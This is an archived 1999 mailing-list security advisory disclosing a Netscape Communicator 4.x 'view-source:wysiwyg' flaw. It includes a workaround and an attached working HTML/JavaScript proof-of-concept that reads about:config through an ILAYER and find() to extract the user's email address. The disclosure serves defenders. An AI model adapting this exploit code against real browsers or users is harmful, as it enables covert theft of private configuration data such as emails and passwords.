Netscape Communicator "view-source:" security vulnerabilities

From: Georgi Guninski (joroat_private)
Date: Tue Jun 01 1999 - 09:08:49 PDT

Next message: Piotr Wilkin: "Linux kernel 2.2.x vulnerability/exploit"

Previous message: aleph1at_private: "New Allaire Security Bulletin (ASB99-09)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This is a multi-part message in MIME format.
--------------6718BA18997C30F69282E3B5
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit

There is a security vulnerability in Netscape Communicator 4.6 Win95,
4.07 Linux (probably all 4.x versions) in the way
it works with "view-source:wysiwyg://1/javascript" URLs. It parses them
in a "view-source" window.
The problem is that it allows access to documents included in the parent
document via
ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading
the whole parsed document.

Vulnerabilites:

 Browsing local directories
 Reading user's cache
 Reading parsed HTML files
 Reading Netscape's configuration ("about:config") including user's
email address, mail servers and password.
 Probably others

This vulnerability may be exploited by using HTML email message.

Workaround: Disable JavaScript
Netscape is notified about the problem.

Demonstration is available at: http://www.nat.bg/~joro/viewsource.html

Regards,
Georgi Guninski
 http://www.nat.bg/~joro
 http://www.whitehats.com/guninski
--------------6718BA18997C30F69282E3B5
Content-Type: text/html; charset=koi8-r;
 name="viewsource.html"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="viewsource.html"

<HTML>
<BODY>
There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way
it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window.
The problem is that it allows access to documents included in the parent document via
ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document.
<BR>
Vulnerabilites:
<HR>
 Browsing local directories<BR>
 Reading user's cache<BR>
 Reading parsed HTML files<BR>
 Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.<BR>
 Probably others<BR>
<BR>
This vulnerability may be exploited by using HTML email message.
<HR>
Workaround: Disable JavaScript
<HR>
This demonstration tries to find your email address, it may take some time.
<BR><BR>
<A HREF="http://www.nat.bg/~joro">Written by Georgi Guninski</A>
<HR>
<SCRIPT>

s="view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>vvvv&gt&gt"
+"<ILAYER SRC=\"view-source:wysiwyg://1/about:config\"></ILAYER>"
+" <SCRIPT>blur();msg1=\"Your email is: \"; mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;"
+"setTimeout(\" "
+"for(i=0;i<charstoread;i++) {"
+" t=res;"
+" find(mend);"
+" for(c=1;c<256;c++) {"
+"   t=res + String.fromCharCode(c);"
+"     if (find(t,true,true)) {"
+"      res=t;"
+"      if (c==32) i=charstoread+1"
+"     } "
+" }"
+"}"
+"res=res.substring(mag.length);"
+"alert(msg1 + res);"
+" ;\",3000);</"+"SCRIPT>'";
//a=window.open(s);
location=s;


</SCRIPT>

</BODY>
</HTML>
--------------6718BA18997C30F69282E3B5--

Next message: Piotr Wilkin: "Linux kernel 2.2.x vulnerability/exploit"
Previous message: aleph1at_private: "New Allaire Security Bulletin (ASB99-09)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:48:01 PDT